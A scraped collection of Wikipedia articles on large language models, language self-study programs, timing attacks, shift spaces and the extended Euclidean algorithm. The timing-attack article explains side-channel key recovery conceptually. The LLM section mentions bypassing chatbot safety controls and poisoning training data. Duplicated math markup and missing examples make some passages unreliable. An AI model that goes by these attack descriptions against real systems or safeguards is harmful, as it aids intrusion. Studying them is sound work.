LLMs' rapid improvement regularly renders benchmarks obsolete, with models exceeding the performance of human annotators.[129] In addition, "shortcut learning" allows AIs to "cheat" on multiple-choice tests by using statistical correlations in superficial test question wording to guess the correct responses, without considering the specific question.[106]
Some datasets are adversarial, focusing on problems that confound LLMs. One example is the TruthfulQA dataset, a question answering dataset consisting of 817 questions that stump LLMs by mimicking falsehoods to which they were exposed during training. For example, an LLM may answer "No" to the question "Can you teach an old dog new tricks?" because of its exposure to the English idiom you can't teach an old dog new tricks, even though this is not literally true.[130]
Another example of an adversarial evaluation dataset is Swag and its successor, HellaSwag, collections of problems in which one of multiple options must be selected to complete a text passage. The incorrect completions were generated by sampling from a language model. The resulting problems are trivial for humans but defeated LLMs. Sample questions:
We see a fitness center sign. We then see a man talking to the camera and sitting and laying on a exercise ball. The man...
BERT selects b) as the most likely completion, though the correct answer is d).[131]
In 2023, Nature Biomedical Engineering wrote that "it is no longer possible to accurately distinguish" human-written text from text created by large language models, and that "It is all but certain that general-purpose large language models will rapidly proliferate... It is a rather safe bet that they will change many industries over time."[132] Goldman Sachs suggested in 2023 that generative language AI could increase global GDP by 7% in the next ten years, and could expose to automation 300 million jobs globally.[133][134] Brinkmann et al. (2023)[135] also argue that LLMs are transforming processes of cultural evolution by shaping processes of variation, transmission, and selection.
Memorization is an emergent behavior in LLMs in which long strings of text are occasionally output verbatim from training data, contrary to typical behavior of traditional artificial neural nets. Evaluations of controlled LLM output measure the amount memorized from training data (focused on GPT-2-series models) as variously over 1% for exact duplicates[136]or up to about 7%.[137]
A 2023 study showed that when ChatGPT 3.5 turbo was prompted to repeat the same word indefinitely, after a few hundreds of repetitions, it would start outputting excerpts from its training data.[138]
Some commenters expressed concern over accidental or deliberate creation of misinformation, or other forms of misuse.[139]For example, the availability of large language models could reduce the skill-level required to commit bioterrorism; biosecurity researcher Kevin Esvelt has suggested that LLM creators should exclude from their training data papers on creating or enhancing pathogens.[140]
The potential presence of "sleeper agents" within LLMs is another emerging security concern. These are hidden functionalities built into the model that remain dormant until triggered by a specific event or condition. Upon activation, the LLM deviates from its expected behavior to make insecure actions.[141]
LLM applications accessible to the public, like ChatGPT or Claude, typically incorporate safety measures designed to filter out harmful content. However, implementing these controls effectively has proven challenging. For instance, a 2023 study[142] proposed a method for circumventing LLM safety systems. In 2025, The American Sunlight Project, a non-profit, published a study[143] showing evidence that the so-called Pravda network, a pro-Russia propaganda aggregator, was strategically placing web content through mass publication and duplication with the intention of biasing LLM outputs. The American Sunlight Project coined this technique "LLM grooming", and pointed to it as a new tool for weaponizing AI to spread disinformation and harmful content.[143][144] Similarly, Yongge Wang[145] illustrated in 2024 how a potential criminal could bypass ChatGPT 4o's safety controls to obtain information on establishing a drug trafficking operation. External filters, circuit breakers, and overrides have been proposed as solutions.[citation needed]
While LLMs have shown remarkable capabilities in generating human-like text, they are susceptible to inheriting and amplifying biases present in their training data. This can manifest in skewed representations or unfair treatment of different demographics, such as those based on race, gender, language, and cultural groups.[146]Since English data is overrepresented in current large language models' training data, it may also downplay non-English views.[147]
AI models can reinforce a wide range of stereotypes, including those based on gender, ethnicity, age, nationality, religion, or occupation. This can lead to outputs that homogenize, or unfairly generalize or caricature groups of people, sometimes in harmful or derogatory ways.[148][149]
Notably, gender bias refers to the tendency of these models to produce outputs that are unfairly prejudiced towards one gender over another. This bias typically arises from the data on which these models are trained. Large language models often assign roles and characteristics based on traditional gender norms.[146]For example, it might associate nurses or secretaries predominantly with women and engineers or CEOs with men.[150]
Selection bias refers to the inherent tendency of large language models to favor certain option identifiers irrespective of the actual content of the options. This bias primarily stems from token bias—that is, the model assigns a higher a priori probability to specific answer tokens (such as "A") when generating responses. As a result, when the ordering of options is altered (for example, by systematically moving the correct answer to different positions), the model's performance can fluctuate significantly. This phenomenon undermines the reliability of large language models in multiple-choice settings.[151][152]
Political bias refers to the tendency of algorithms to systematically favor certain political viewpoints, ideologies, or outcomes over others. Language models may also exhibit political biases. Since the training data includes a wide range of political opinions and coverage, the models might generate responses that lean towards particular political ideologies or viewpoints, depending on the prevalence of those views in the data.[153]
The energy demands of LLMs have grown along with their size and capabilities. Data centers that enable LLM training require substantial amounts of electricity. Much of that electricity is generated by non-renewable resources that create greenhouse gases and contribute to climate change.[154] Nuclear power and geothermal energy are two options tech companies are exploring to meet the sizable energy demands of LLM training.[155] The significant expense of investing in geothermal solutions has led to major shale producers like Chevron and Exxon Mobil advocating for tech companies to use electricity produced via natural gas to fuel their large energy demands.[156]
|
https://en.wikipedia.org/wiki/Large_language_model
|
Self-study language acquisition programs allow learning without having a teacher present,[1][2] and the courses can supplement or replace classroom instruction.[3] Universities use self-study programs for less-commonly taught languages, where having professors is not feasible.[4][5] Self-study programs are available on paper, audio files, video files, smartphone apps, computers, or any combination.[6]
This list is limited to programs that teach four or more languages. There are many others that teach one language.
Alphabetical lists of languages show the courses available to learn each language, at All Language Resources, Lang1234, Martindale's Language Center, Omniglot, and Rüdiger Köppe. (The UCLA Language Materials Project has ended.) For the thousands of languages not listed on those sites, for which no course exists, Global Recordings Network has recorded a standard set of Bible stories in 6,000 languages. With effort, learners can study any language by comparing their recordings to the same story in a language they know.[7]
The list of self-study programs, below, shows the number of languages taught by each program, the name of the program, and the number of different languages used for instruction. Multiple languages of instruction may be available for some but not all courses. For example, Reise Know-How uses six languages to teach German, but only German to teach the other languages. On the other hand, Eurotalk, Pronunciator and 50Languages use all languages to teach all the other languages.
|
https://en.wikipedia.org/wiki/List_of_language_self-study_programs
|
In cryptography, a timing attack is a side-channel attack in which the attacker attempts to compromise a cryptosystem by analyzing the time taken to execute cryptographic algorithms. Every logical operation in a computer takes time to execute, and the time can differ based on the input; with precise measurements of the time for each operation, an attacker can work backwards to the input. Finding secrets through timing information may be significantly easier than using cryptanalysis of known plaintext, ciphertext pairs. Sometimes timing information is combined with cryptanalysis to increase the rate of information leakage.[1]
Information can leak from a system through measurement of the time it takes to respond to certain queries. How much this information can help an attacker depends on many variables: cryptographic system design, the CPU running the system, the algorithms used, assorted implementation details, timing attack countermeasures, the accuracy of the timing measurements, etc. Timing attacks can be applied to any algorithm that has data-dependent timing variation. Removing timing-dependencies is difficult in some algorithms that use low-level operations that frequently exhibit varied execution time.
Timing attacks are often overlooked in the design phase because they are so dependent on the implementation and can be introduced unintentionally with compiler optimizations. Avoidance of timing attacks involves design of constant-time functions and careful testing of the final executable code.[1]
Many cryptographic algorithms can be implemented (or masked by a proxy) in a way that reduces or eliminates data-dependent timing information, known as a constant-time algorithm. An implementation of such an algorithm is sometimes called a timing-safe implementation.[2] Consider an implementation in which every call to a subroutine always returns in exactly x seconds, where x is the maximum time it ever takes to execute that routine on every possible authorized input. In such an implementation, the timing of the algorithm is less likely to leak information about the data supplied to that invocation.[3] The downside of this approach is that the time used for all executions becomes that of the worst-case performance of the function.
The data-dependency of timing may stem from one of the following:[1]
Timing attacks can also be performed remotely over a network. Observing delays in a system is often influenced by random perturbations, which become even more significant when the observation occurs through a network. In most cases, timing attacks require the attacker to have knowledge of the implementation details. However, such attacks can also be leveraged to identify the algorithms in use and facilitate reverse engineering.
The execution time for the square-and-multiply algorithm used in modular exponentiation depends linearly on the number of '1' bits in the key. While the number of '1' bits alone is not nearly enough information to make finding the key easy, repeated executions with the same key and different inputs can be used to perform statistical correlation analysis of timing information to recover the key completely, even by a passive attacker. Observed timing measurements often include noise (from such sources as network latency, or disk drive access differences from access to access, and the error correction techniques used to recover from transmission errors). Nevertheless, timing attacks are practical against a number of encryption algorithms, including RSA, ElGamal, and the Digital Signature Algorithm.
In 2003, Boneh and Brumley demonstrated a practical network-based timing attack on SSL-enabled web servers, based on a different vulnerability having to do with the use of RSA with Chinese remainder theorem optimizations. The actual network distance was small in their experiments, but the attack successfully recovered a server private key in a matter of hours. This demonstration led to the widespread deployment and use of blinding techniques in SSL implementations. In this context, blinding is intended to remove correlations between key and encryption time.[4]
Some versions of Unix use a relatively expensive implementation of the crypt library function for hashing an 8-character password into an 11-character string. On older hardware, this computation took a deliberately and measurably long time: as much as two or three seconds in some cases.[citation needed] The login program in early versions of Unix executed the crypt function only when the login name was recognized by the system. This leaked information through timing about the validity of the login name, even when the password was incorrect. An attacker could exploit such leaks by first applying brute force to produce a list of login names known to be valid, then attempt to gain access by combining only these names with a large set of passwords known to be frequently used. Without any information on the validity of login names the time needed to execute such an approach would increase by orders of magnitude, effectively rendering it useless. Later versions of Unix have fixed this leak by always executing the crypt function, regardless of login name validity.[citation needed]
Two otherwise securely isolated processes running on a single system with either cache memory or virtual memory can communicate by deliberately causing page faults and/or cache misses in one process, then monitoring the resulting changes in access times from the other. Likewise, if an application is trusted, but its paging/caching is affected by branching logic, it may be possible for a second application to determine the values of the data compared to the branch condition by monitoring access time changes; in extreme examples, this can allow recovery of cryptographic key bits.[5][6]
The 2017 Meltdown and Spectre attacks, which forced CPU manufacturers (including Intel, AMD, ARM, and IBM) to redesign their CPUs, both rely on timing attacks.[7] As of early 2018, almost every computer system in the world is affected by Spectre.[8][9][10]
Timing attacks are difficult to prevent and can often be used to extend other attacks. For example, in 2018, an old attack on RSA was rediscovered in a timing side-channel variant, two decades after the original bug.[11]
The following C code demonstrates a typical insecure string comparison which stops testing as soon as a character doesn't match. For example, when comparing "ABCDE" with "ABxDE" it will return after 3 loop iterations:
By comparison, the following version runs in constant time by testing all characters and using a bitwise operation to accumulate the result:
In the world of C library functions, the first function is analogous to memcmp(), while the latter is analogous to NetBSD's consttime_memequal()[12] or OpenBSD's timingsafe_bcmp() and timingsafe_memcmp(). On other systems, the comparison functions from cryptographic libraries like OpenSSL and libsodium can be used.
Timing attacks are easier to mount if the adversary knows the internals of the hardware implementation, and even more so, the cryptographic system in use. Since cryptographic security should never depend on the obscurity of either (see security through obscurity, specifically both Shannon's Maxim and Kerckhoffs's principle), resistance to timing attacks should not either. If nothing else, an exemplar can be purchased and reverse engineered. Timing attacks and other side-channel attacks may also be useful in identifying, or possibly reverse-engineering, a cryptographic algorithm used by some device.
|
https://en.wikipedia.org/wiki/Timing_attack
|
In symbolic dynamics and related branches of mathematics, a shift space or subshift is a set of infinite words that represent the evolution of a discrete system. In fact, shift spaces and symbolic dynamical systems are often considered synonyms. The most widely studied shift spaces are the subshifts of finite type and the sofic shifts.
In the classical framework[1] a shift space is any subset Λ of A^ℤ := {(xᵢ)_{i∈ℤ} : xᵢ ∈ A for all i ∈ ℤ}, where A is a finite set, which is closed in the Tychonoff topology and invariant under translations. More generally, one can define a shift space as a closed, translation-invariant subset of A^𝔾, where A is any non-empty set and 𝔾 is any monoid.[2][3]
LetG{\displaystyle \mathbb {G} }be amonoid, and giveng,h∈G{\displaystyle g,h\in \mathbb {G} }, denote the operation ofg{\displaystyle g}withh{\displaystyle h}by the productgh{\displaystyle gh}. Let1G{\displaystyle \mathbf {1} _{\mathbb {G} }}denote the identity ofG{\displaystyle \mathbb {G} }. Consider a non-empty setA{\displaystyle A}(an alphabet) with thediscrete topology, and defineAG{\displaystyle A^{\mathbb {G} }}as the set of all patterns overA{\displaystyle A}indexed byG{\displaystyle \mathbb {G} }. Forx=(xi)i∈G∈AG{\displaystyle \mathbf {x} =(x_{i})_{i\in \mathbb {G} }\in A^{\mathbb {G} }}and a subsetN⊂G{\displaystyle N\subset \mathbb {G} }, we denote the restriction ofx{\displaystyle \mathbf {x} }to the indices ofN{\displaystyle N}asxN:=(xi)i∈N{\displaystyle \mathbf {x} _{N}:=(x_{i})_{i\in N}}.
OnAG{\displaystyle A^{\mathbb {G} }}, we consider the prodiscrete topology, which makesAG{\displaystyle A^{\mathbb {G} }}a Hausdorff and totally disconnected topological space. In the case ofA{\displaystyle A}being finite, it follows thatAG{\displaystyle A^{\mathbb {G} }}is compact. However, ifA{\displaystyle A}is not finite, thenAG{\displaystyle A^{\mathbb {G} }}is not even locally compact.
This topology will be metrizable if and only ifG{\displaystyle \mathbb {G} }is countable, and, in any case, the base of this topology consists of a collection of open/closed sets (called cylinders), defined as follows: given a finite set of indicesD⊂G{\displaystyle D\subset \mathbb {G} }, and for eachi∈D{\displaystyle i\in D}, letai∈A{\displaystyle a_{i}\in A}. Thecylindergiven byD{\displaystyle D}and(ai)i∈D∈A|D|{\displaystyle (a_{i})_{i\in D}\in A^{|D|}}is the set
WhenD={g}{\displaystyle D=\{g\}}, we denote the cylinder fixing the symbolb{\displaystyle b}at the entry indexed byg{\displaystyle g}simply as[b]g{\displaystyle [b]_{g}}.
In other words, a cylinder [(aᵢ)_{i∈D}]_D is the set of all infinite patterns of A^𝔾 which contain the finite pattern (aᵢ)_{i∈D}.
Giveng∈G{\displaystyle g\in \mathbb {G} }, theg-shift maponAG{\displaystyle A^{\mathbb {G} }}is denoted byσg:AG→AG{\displaystyle \sigma ^{g}:A^{\mathbb {G} }\to A^{\mathbb {G} }}and defined as
Ashift spaceover the alphabetA{\displaystyle A}is a setΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}that is closed under the topology ofAG{\displaystyle A^{\mathbb {G} }}and invariant under translations, i.e.,σg(Λ)⊂Λ{\displaystyle \sigma ^{g}(\Lambda )\subset \Lambda }for allg∈G{\displaystyle g\in \mathbb {G} }.[note 1]We consider in the shift spaceΛ{\displaystyle \Lambda }the induced topology fromAG{\displaystyle A^{\mathbb {G} }}, which has as basic open sets the cylinders[(ai)i∈D]Λ:=[(ai)i∈D]∩Λ{\displaystyle {\big [}(a_{i})_{i\in D}{\big ]}_{\Lambda }:={\big [}(a_{i})_{i\in D}{\big ]}\cap \Lambda }.
For eachk∈N∗{\displaystyle k\in \mathbb {N} ^{*}}, defineNk:=⋃N⊂G#N=kAN{\displaystyle {\mathcal {N}}_{k}:=\bigcup _{N\subset \mathbb {G} \atop \#N=k}A^{N}}, andNAGf:=⋃k∈NNk=⋃N⊂G#N<∞AN{\displaystyle {\mathcal {N}}_{A^{\mathbb {G} }}^{f}:=\bigcup _{k\in \mathbb {N} }{\mathcal {N}}_{k}=\bigcup _{N\subset \mathbb {G} \atop \#N<\infty }A^{N}}. An equivalent way to define a shift space is to take a set offorbidden patternsF⊂NAGf{\displaystyle F\subset {\mathcal {N}}_{A^{\mathbb {G} }}^{f}}and define a shift space as the set
Intuitively, a shift spaceXF{\displaystyle X_{F}}is the set of all infinite patterns that do not contain any forbidden finite pattern ofF{\displaystyle F}.
Given a shift spaceΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}and a finite set of indicesN⊂G{\displaystyle N\subset \mathbb {G} }, letW∅(Λ):={ϵ}{\displaystyle W_{\emptyset }(\Lambda ):=\{\epsilon \}}, whereϵ{\displaystyle \epsilon }stands for the empty word, and forN≠∅{\displaystyle N\neq \emptyset }letWN(Λ)⊂AN{\displaystyle W_{N}(\Lambda )\subset A^{N}}be the set of all finite configurations ofAN{\displaystyle A^{N}}that appear in some sequence ofΛ{\displaystyle \Lambda }, i.e.,
Note that, sinceΛ{\displaystyle \Lambda }is a shift space, ifM⊂G{\displaystyle M\subset \mathbb {G} }is a translation ofN⊂G{\displaystyle N\subset \mathbb {G} }, i.e.,M=gN{\displaystyle M=gN}for someg∈G{\displaystyle g\in \mathbb {G} }, then(wj)j∈M∈WM(Λ){\displaystyle (w_{j})_{j\in M}\in W_{M}(\Lambda )}if and only if there exists(vi)i∈N∈WN(Λ){\displaystyle (v_{i})_{i\in N}\in W_{N}(\Lambda )}such thatwj=vi{\displaystyle w_{j}=v_{i}}ifj=gi{\displaystyle j=gi}. In other words,WM(Λ){\displaystyle W_{M}(\Lambda )}andWN(Λ){\displaystyle W_{N}(\Lambda )}contain the same configurations modulo translation. We will call the set
the language of Λ. In the general context stated here, the language of a shift space does not have the same meaning as in formal language theory; but in the classical framework, which considers the alphabet A to be finite and 𝔾 to be ℕ or ℤ with the usual addition, the language of a shift space is a formal language.
The classical framework for shift spaces consists of considering the alphabetA{\displaystyle A}as finite, andG{\displaystyle \mathbb {G} }as the set of non-negative integers (N{\displaystyle \mathbb {N} }) with the usual addition, or the set of all integers (Z{\displaystyle \mathbb {Z} }) with the usual addition. In both cases, the identity element1G{\displaystyle \mathbf {1} _{\mathbb {G} }}corresponds to the number 0. Furthermore, whenG=N{\displaystyle \mathbb {G} =\mathbb {N} }, since allN∖{0}{\displaystyle \mathbb {N} \setminus \{0\}}can be generated from the number 1, it is sufficient to consider a unique shift map given byσ(x)n=xn+1{\displaystyle \sigma (\mathbf {x} )_{n}=x_{n+1}}for alln{\displaystyle n}. On the other hand, for the case ofG=Z{\displaystyle \mathbb {G} =\mathbb {Z} }, since allZ{\displaystyle \mathbb {Z} }can be generated from the numbers {-1, 1}, it is sufficient to consider two shift maps given for alln{\displaystyle n}byσ(x)n=xn+1{\displaystyle \sigma (\mathbf {x} )_{n}=x_{n+1}}and byσ−1(x)n=xn−1{\displaystyle \sigma ^{-1}(\mathbf {x} )_{n}=x_{n-1}}.
Furthermore, whenever 𝔾 is ℕ or ℤ with the usual addition (independently of the cardinality of A), due to its algebraic structure, it is sufficient to consider only cylinders of the form
Moreover, the language of a shift spaceΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}will be given by
whereW0:={ϵ}{\displaystyle W_{0}:=\{\epsilon \}}andϵ{\displaystyle \epsilon }stands for the empty word, and
In the same way, for the particular case ofG=Z{\displaystyle \mathbb {G} =\mathbb {Z} }, it follows that to define a shift spaceΛ=XF{\displaystyle \Lambda =X_{F}}we do not need to specify the index ofG{\displaystyle \mathbb {G} }on which the forbidden words ofF{\displaystyle F}are defined, that is, we can just considerF⊂⋃n≥1An{\displaystyle F\subset \bigcup _{n\geq 1}A^{n}}and then
However, if 𝔾 = ℕ and we define a shift space Λ = X_F as above, without specifying the index at which the words are forbidden, then we will only capture shift spaces which are invariant under the shift map, that is, such that σ(X_F) = X_F. In fact, to define a shift space X_F ⊂ A^ℕ such that σ(X_F) ⊊ X_F, it is necessary to specify from which index on the words of F are forbidden.
In particular, in the classical framework of A being finite, and 𝔾 being ℕ or ℤ with the usual addition, it follows that M_F is finite if and only if F is finite, which leads to the classical definition of a shift of finite type as those shift spaces Λ ⊂ A^𝔾 such that Λ = X_F for some finite F.
Among several types of shift spaces, the most widely studied are the shifts of finite type and the sofic shifts.
In the case when the alphabet A is finite, a shift space Λ is a shift of finite type if we can take a finite set of forbidden patterns F such that Λ = X_F, and Λ is a sofic shift if it is the image of a shift of finite type under a sliding block code[1] (that is, a map Φ that is continuous and commutes with all g-shift maps). If A is finite and 𝔾 is ℕ or ℤ with the usual addition, then the shift Λ is a sofic shift if and only if W(Λ) is a regular language.
The name "sofic" was coined byWeiss (1973), based on theHebrewword סופי meaning "finite", to refer to the fact that this is a generalization of a finiteness property.[4]
When A is infinite, it is possible to define shifts of finite type as shift spaces Λ for which one can take a set F of forbidden words such that M_F is finite and Λ = X_F.[3] In this context of an infinite alphabet, a sofic shift is defined as the image of a shift of finite type under a particular class of sliding block codes.[3] Both the finiteness of M_F and the additional conditions on the sliding block codes are trivially satisfied whenever A is finite.
Shift spaces are the topological spaces on which symbolic dynamical systems are usually defined.
Given a shift space Λ ⊂ A^G and a g-shift map σ^g : Λ → Λ, it follows that the pair (Λ, σ^g) is a topological dynamical system.
Two shift spaces Λ ⊂ A^G and Γ ⊂ B^G are said to be topologically conjugate (or simply conjugate) if for each g-shift map the topological dynamical systems (Λ, σ^g) and (Γ, σ^g) are topologically conjugate, that is, if there exists a continuous map Φ : Λ → Γ such that Φ ∘ σ^g = σ^g ∘ Φ. Such maps are known as generalized sliding block codes, or simply as sliding block codes whenever Φ is uniformly continuous.[3]
Although any continuous map Φ from Λ ⊂ A^G to itself will define a topological dynamical system (Λ, Φ), in symbolic dynamics it is usual to consider only continuous maps Φ : Λ → Λ which commute with all g-shift maps, i.e., maps which are generalized sliding block codes. The dynamical system (Λ, Φ) is known as a generalized cellular automaton (or just as a cellular automaton whenever Φ is uniformly continuous).
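As an illustrative sketch (this example is not from the article), a classical sliding block code on the full binary shift is the 2-block map (Φx)_n = x_n ⊕ x_{n+1}; on finite prefixes one can check that it commutes with the shift map:

```python
def phi(x):
    """2-block sliding code on {0,1}-sequences: (Phi x)_n = x_n XOR x_{n+1}."""
    return [x[i] ^ x[i + 1] for i in range(len(x) - 1)]

def shift(x):
    """One-sided shift map: drop the first symbol."""
    return x[1:]

x = [0, 1, 1, 0, 1, 0, 0, 1]
# Phi commutes with the shift (on the indices where both sides are defined):
assert phi(shift(x)) == shift(phi(x))
```

The same check works for any window length, which is exactly the sliding-block-code property described above.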
The first trivial example of a shift space (of finite type) is the full shift A^ℕ.
Let A = {a, b}. The set of all infinite words over A containing at most one b is a sofic subshift, not of finite type. The set of all infinite words over A whose b's form blocks of prime length is not sofic (this can be shown by using the pumping lemma).
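A small sketch (not from the article) of why the "at most one b" subshift is not of finite type: for any candidate finite forbidden set whose longest word has length m, the word b·aᵐ·b keeps its two b's too far apart for any single block of length ≤ m to witness, yet every length-m window of it is a legal window.

```python
def at_most_one_b(word):
    """Membership test for finite windows of the 'at most one b' subshift."""
    return word.count("b") <= 1

def windows(word, m):
    """All length-m factors of the word."""
    return [word[i:i + m] for i in range(len(word) - m + 1)]

m = 4
bad = "b" + "a" * m + "b"  # two b's: not a window of the subshift
assert not at_most_one_b(bad)
# ...yet every length-m window of it is individually legal:
assert all(at_most_one_b(w) for w in windows(bad, m))
```

Since m was arbitrary, no finite forbidden set of blocks can define this subshift.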
The space of infinite strings in two letters, {0, 1}^ℕ, is called the Bernoulli process. It is isomorphic to the Cantor set.
The bi-infinite space of strings in two letters, {0, 1}^ℤ, is commonly associated with the baker's map, or rather is topologically conjugate to it.
https://en.wikipedia.org/wiki/Shift_space
In arithmetic and computer programming, the extended Euclidean algorithm is an extension of the Euclidean algorithm: in addition to the greatest common divisor (gcd) of integers a and b, it also computes the coefficients of Bézout's identity, which are integers x and y such that ax + by = gcd(a, b).
This is a certifying algorithm, because the gcd is the only number that can simultaneously satisfy this equation and divide the inputs.[1] It also allows one to compute, at almost no extra cost, the quotients of a and b by their greatest common divisor.
Extended Euclidean algorithm also refers to a very similar algorithm for computing the polynomial greatest common divisor and the coefficients of Bézout's identity of two univariate polynomials.
The extended Euclidean algorithm is particularly useful when a and b are coprime. With that provision, x is the modular multiplicative inverse of a modulo b, and y is the modular multiplicative inverse of b modulo a. Similarly, the polynomial extended Euclidean algorithm allows one to compute the multiplicative inverse in algebraic field extensions and, in particular, in finite fields of non-prime order. It follows that both extended Euclidean algorithms are widely used in cryptography. In particular, the computation of the modular multiplicative inverse is an essential step in the derivation of key-pairs in the RSA public-key encryption method.
The standard Euclidean algorithm proceeds by a succession of Euclidean divisions whose quotients are not used. Only the remainders are kept. For the extended algorithm, the successive quotients are used. More precisely, the standard Euclidean algorithm with a and b as input consists of computing a sequence q_1, …, q_k of quotients and a sequence r_0, …, r_{k+1} of remainders such that r_0 = a, r_1 = b, and r_{i+1} = r_{i−1} − q_i r_i with 0 ≤ r_{i+1} < |r_i|.
It is the main property of Euclidean division that the inequalities on the right define q_i and r_{i+1} uniquely from r_{i−1} and r_i.
The computation stops when one reaches a remainder r_{k+1} which is zero; the greatest common divisor is then the last nonzero remainder r_k.
The extended Euclidean algorithm proceeds similarly, but adds two other sequences, defined by s_0 = 1, s_1 = 0, t_0 = 0, t_1 = 1, and s_{i+1} = s_{i−1} − q_i s_i, t_{i+1} = t_{i−1} − q_i t_i.
The computation also stops when r_{k+1} = 0 and gives gcd(a, b) = r_k = a s_k + b t_k.
Moreover, if a and b are both positive and gcd(a, b) ≠ min(a, b), then |s_i| ≤ ⌊b / (2 gcd(a, b))⌋ and |t_i| ≤ ⌊a / (2 gcd(a, b))⌋
for 0 ≤ i ≤ k, where ⌊x⌋ denotes the integral part of x, that is, the greatest integer not greater than x.
This implies that the pair of Bézout's coefficients provided by the extended Euclidean algorithm is the minimal pair of Bézout coefficients, as being the unique pair satisfying both of the above inequalities.
It also means that the algorithm can be run without integer overflow by a computer program using integers of a fixed size that is larger than that of a and b.
The following table shows how the extended Euclidean algorithm proceeds with input 240 and 46 (the table was lost in this copy and is reconstructed here from the recurrences above):

    index i   quotient q_{i−1}   remainder r_i   s_i    t_i
    0         —                  240             1      0
    1         —                  46              0      1
    2         5                  10              1      −5
    3         4                  6               −4     21
    4         1                  4               5      −26
    5         1                  2               −9     47
    6         2                  0               23     −120

The greatest common divisor is the last nonzero entry, 2, in the column "remainder". The computation stops at row 6, because the remainder in it is 0. The Bézout coefficients appear in the last two columns of the second-to-last row. In fact, it is easy to verify that −9 × 240 + 47 × 46 = 2. Finally, the last two entries 23 and −120 of the last row are, up to sign, the quotients of the inputs 46 and 240 by the greatest common divisor 2.
As 0 ≤ r_{i+1} < |r_i|, the sequence of the r_i is a decreasing sequence of nonnegative integers (from i = 2 on). Thus it must stop with some r_{k+1} = 0. This proves that the algorithm stops eventually.
As r_{i+1} = r_{i−1} − r_i q_i, the greatest common divisor is the same for (r_{i−1}, r_i) and (r_i, r_{i+1}). This shows that the greatest common divisor of the input a = r_0, b = r_1 is the same as that of r_k, r_{k+1} = 0. This proves that r_k is the greatest common divisor of a and b. (Until this point, the proof is the same as that of the classical Euclidean algorithm.)
As a = r_0 and b = r_1, we have a s_i + b t_i = r_i for i = 0 and 1. The relation follows by induction for all i > 1: r_{i+1} = r_{i−1} − r_i q_i = (a s_{i−1} + b t_{i−1}) − (a s_i + b t_i) q_i = (a s_{i−1} − a s_i q_i) + (b t_{i−1} − b t_i q_i) = a s_{i+1} + b t_{i+1}.
Thus s_k and t_k are Bézout coefficients.
Consider the matrix

    A_i = ( s_{i−1}  s_i )
          ( t_{i−1}  t_i ).

The recurrence relation may be rewritten in matrix form:

    A_{i+1} = A_i · ( 0    1   )
                    ( 1   −q_i ).

The matrix A_1 is the identity matrix and its determinant is one. The determinant of the rightmost matrix in the preceding formula is −1. It follows that the determinant of A_i is (−1)^{i−1}. In particular, for i = k + 1, we have s_k t_{k+1} − t_k s_{k+1} = (−1)^k. Viewing this as a Bézout's identity, this shows that s_{k+1} and t_{k+1} are coprime. The relation a s_{k+1} + b t_{k+1} = 0 that has been proved above and Euclid's lemma show that s_{k+1} divides b, that is, b = d s_{k+1} for some integer d. Dividing by s_{k+1}, the relation a s_{k+1} + b t_{k+1} = 0 gives a = −d t_{k+1}. So, s_{k+1} and −t_{k+1} are coprime integers that are the quotients of a and b by a common factor, which is thus their greatest common divisor or its opposite.
To prove the last assertion, assume that a and b are both positive and gcd(a, b) ≠ min(a, b). Then a ≠ b, and if a < b, it can be seen that the s and t sequences for (a, b) under the EEA are, up to initial 0s and 1s, the t and s sequences for (b, a). The definitions then show that the (a, b) case reduces to the (b, a) case. So assume that a > b without loss of generality.
It can be seen that s_2 is 1 and s_3 (which exists by gcd(a, b) ≠ min(a, b)) is a negative integer. Thereafter, the s_i alternate in sign and strictly increase in magnitude, which follows inductively from the definitions and the fact that q_i ≥ 1 for 1 ≤ i ≤ k; the case i = 1 holds because a > b. The same is true for the t_i after the first few terms, for the same reason. Furthermore, it is easy to see that q_k ≥ 2 (when a and b are both positive and gcd(a, b) ≠ min(a, b)). Thus, noticing that |s_{k+1}| = |s_{k−1}| + q_k |s_k|, we obtain |s_{k+1}| = |b / gcd(a, b)| ≥ 2|s_k| and |t_{k+1}| = |a / gcd(a, b)| ≥ 2|t_k|.
This, together with the fact that s_k and t_k are larger than or equal in absolute value to any previous s_i or t_i respectively, completes the proof.
For univariate polynomials with coefficients in a field, everything works similarly: Euclidean division, Bézout's identity and the extended Euclidean algorithm. The first difference is that, in the Euclidean division and the algorithm, the inequality 0 ≤ r_{i+1} < |r_i| has to be replaced by an inequality on the degrees: deg r_{i+1} < deg r_i. Otherwise, everything which precedes in this article remains the same, simply by replacing integers by polynomials.
A second difference lies in the bound on the size of the Bézout coefficients provided by the extended Euclidean algorithm, which is more accurate in the polynomial case, leading to the following theorem.
If a and b are two nonzero polynomials, then the extended Euclidean algorithm produces the unique pair of polynomials (s, t) such that a s + b t = gcd(a, b)
and deg s < deg b − deg(gcd(a, b)), deg t < deg a − deg(gcd(a, b)).
A third difference is that, in the polynomial case, the greatest common divisor is defined only up to multiplication by a nonzero constant. There are several ways to define a greatest common divisor unambiguously.
In mathematics, it is common to require that the greatest common divisor be a monic polynomial. To get this, it suffices to divide every element of the output by the leading coefficient of r_k. This ensures that, if a and b are coprime, one gets 1 on the right-hand side of Bézout's identity. Otherwise, one may get any nonzero constant. In computer algebra, the polynomials commonly have integer coefficients, and this way of normalizing the greatest common divisor introduces too many fractions to be convenient.
The second way to normalize the greatest common divisor in the case of polynomials with integer coefficients is to divide every output by the content of r_k, to get a primitive greatest common divisor. If the input polynomials are coprime, this normalisation also provides a greatest common divisor equal to 1. The drawback of this approach is that many fractions must be computed and simplified during the computation.
A third approach consists in extending the algorithm of subresultant pseudo-remainder sequences in a way that is similar to the extension of the Euclidean algorithm to the extended Euclidean algorithm. This ensures that, when starting with polynomials with integer coefficients, all polynomials that are computed have integer coefficients. Moreover, every computed remainder r_i is a subresultant polynomial. In particular, if the input polynomials are coprime, then Bézout's identity becomes a s + b t = Res(a, b),
where Res(a, b) denotes the resultant of a and b. In this form of Bézout's identity, there is no denominator in the formula. If one divides everything by the resultant, one gets the classical Bézout's identity, with an explicit common denominator for the rational numbers that appear in it.
To implement the algorithm that is described above, one should first remark that only the last two values of the indexed variables are needed at each step. Thus, to save memory, each indexed variable must be replaced by just two variables.
For simplicity, the following algorithm (and the other algorithms in this article) uses parallel assignments. In a programming language which does not have this feature, the parallel assignments need to be simulated with an auxiliary variable. For example, the first one,

    (old_r, r) := (r, old_r − quotient × r)

is equivalent to

    prov := r
    r := old_r − quotient × r
    old_r := prov

and similarly for the other parallel assignments.
This leads to the following code:
